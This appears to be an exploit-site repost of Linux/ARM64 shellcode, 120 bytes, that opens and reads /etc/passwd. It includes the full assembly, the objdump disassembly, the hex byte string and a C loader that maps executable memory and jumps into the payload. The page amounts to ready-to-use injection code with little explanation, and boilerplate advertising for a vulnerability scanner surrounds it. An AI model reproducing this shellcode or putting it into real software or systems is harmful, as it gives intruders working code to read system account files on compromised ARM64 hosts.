Registerlinuxarm64 read etcpasswd shellcode (120 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & arm vulnerability
Online Vulnerability Scanner Tools
Code...
/* # Title: Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes) # Date: 2019-06-30 # Tested: Ubuntu 16.04 (aarch64) # Author: Ken Kitahara # Compilation: gcc -o loader loader.c ubuntu@ubuntu:~/works$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus (development branch) Release: 16.04 Codename: xenial ubuntu@ubuntu:~/works$ uname -a Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux ubuntu@ubuntu:~/works$ cat passwd.s .section .text .global _start _start: // fd = openat(0, "/etc/passwd", O_RDONLY) mov x0, xzr mov x1, #0x7773 movk x1, #0x64, lsl #16 str x1, [sp, #-8]! mov x1, #0x652f movk x1, #0x6374, lsl #16 movk x1, #0x702f, lsl #32 movk x1, #0x7361, lsl #48 str x1, [sp, #-8]! add x1, sp, x0 mov x2, xzr mov x8, #56 svc #0x1337 mvn x3, x0 // read(fd, *buf, size) mov x2, #0xfff sub sp, sp, x2 mov x8, xzr add x1, sp, x8 mov x8, #63 svc #0x1337 // write(1, *buf, size) str x0, [sp, #-8]! lsr x0, x2, #11 ldr x2, [sp], #8 mov x8, #64 svc #0x1337 // status = close(fd) mvn x0, x3 mov x8, #57 svc #0x1337 // exit(status) mov x8, #93 svc #0x1337 ubuntu@ubuntu:~/works$ as -o passwd.o passwd.s && ld -o passwd passwd.o ubuntu@ubuntu:~/works$ objdump -d ./passwd ./passwd: file format elf64-littleaarch64 Disassembly of section .text: 0000000000400078 <_start>: 400078: aa1f03e0 mov x0, xzr 40007c: d28eee61 mov x1, #0x7773 // #30579 400080: f2a00c81 movk x1, #0x64, lsl #16 400084: f81f8fe1 str x1, [sp,#-8]! 400088: d28ca5e1 mov x1, #0x652f // #25903 40008c: f2ac6e81 movk x1, #0x6374, lsl #16 400090: f2ce05e1 movk x1, #0x702f, lsl #32 400094: f2ee6c21 movk x1, #0x7361, lsl #48 400098: f81f8fe1 str x1, [sp,#-8]! 40009c: 8b2063e1 add x1, sp, x0 4000a0: aa1f03e2 mov x2, xzr 4000a4: d2800708 mov x8, #0x38 // #56 4000a8: d40266e1 svc #0x1337 4000ac: aa2003e3 mvn x3, x0 4000b0: d281ffe2 mov x2, #0xfff // #4095 4000b4: cb2263ff sub sp, sp, x2 4000b8: aa1f03e8 mov x8, xzr 4000bc: 8b2863e1 add x1, sp, x8 4000c0: d28007e8 mov x8, #0x3f // #63 4000c4: d40266e1 svc #0x1337 4000c8: f81f8fe0 str x0, [sp,#-8]! 4000cc: d34bfc40 lsr x0, x2, #11 4000d0: f84087e2 ldr x2, [sp],#8 4000d4: d2800808 mov x8, #0x40 // #64 4000d8: d40266e1 svc #0x1337 4000dc: aa2303e0 mvn x0, x3 4000e0: d2800728 mov x8, #0x39 // #57 4000e4: d40266e1 svc #0x1337 4000e8: d2800ba8 mov x8, #0x5d // #93 4000ec: d40266e1 svc #0x1337 ubuntu@ubuntu:~/works$ objcopy -O binary passwd passwd.bin ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' passwd.bin && echo \xe0\x03\x1f\xaa\x61\xee\x8e\xd2\x81\x0c\xa0\xf2\xe1\x8f\x1f\xf8\xe1\xa5\x8c\xd2\x81\x6e\xac\xf2\xe1\x05\xce\xf2\x21\x6c\xee\xf2\xe1\x8f\x1f\xf8\xe1\x63\x20\x8b\xe2\x03\x1f\xaa\x08\x07\x80\xd2\xe1\x66\x02\xd4\xe3\x03\x20\xaa\xe2\xff\x81\xd2\xff\x63\x22\xcb\xe8\x03\x1f\xaa\xe1\x63\x28\x8b\xe8\x07\x80\xd2\xe1\x66\x02\xd4\xe0\x8f\x1f\xf8\x40\xfc\x4b\xd3\xe2\x87\x40\xf8\x08\x08\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x23\xaa\x28\x07\x80\xd2\xe1\x66\x02\xd4\xa8\x0b\x80\xd2\xe1\x66\x02\xd4 */ #include <stdio.h> #include <sys/mman.h> #include <string.h> #include <stdlib.h> int (*sc)(); char shellcode[] = "\xe0\x03\x1f\xaa\x61\xee\x8e\xd2\x81\x0c\xa0\xf2\xe1\x8f\x1f\xf8" "\xe1\xa5\x8c\xd2\x81\x6e\xac\xf2\xe1\x05\xce\xf2\x21\x6c\xee\xf2" "\xe1\x8f\x1f\xf8\xe1\x63\x20\x8b\xe2\x03\x1f\xaa\x08\x07\x80\xd2" "\xe1\x66\x02\xd4\xe3\x03\x20\xaa\xe2\xff\x81\xd2\xff\x63\x22\xcb" "\xe8\x03\x1f\xaa\xe1\x63\x28\x8b\xe8\x07\x80\xd2\xe1\x66\x02\xd4" "\xe0\x8f\x1f\xf8\x40\xfc\x4b\xd3\xe2\x87\x40\xf8\x08\x08\x80\xd2" "\xe1\x66\x02\xd4\xe0\x03\x23\xaa\x28\x07\x80\xd2\xe1\x66\x02\xd4" "\xa8\x0b\x80\xd2\xe1\x66\x02\xd4"; int main(int argc, char **argv) { printf("Shellcode Length: %zd Bytes\n", strlen(shellcode)); void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } memcpy(ptr, shellcode, sizeof(shellcode)); sc = ptr; sc(); return 0; }
Linuxarm64 read etcpasswd shellcode (120 bytes) Vulnerability / Exploit Source : Linuxarm64 read etcpasswd shellcode (120 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes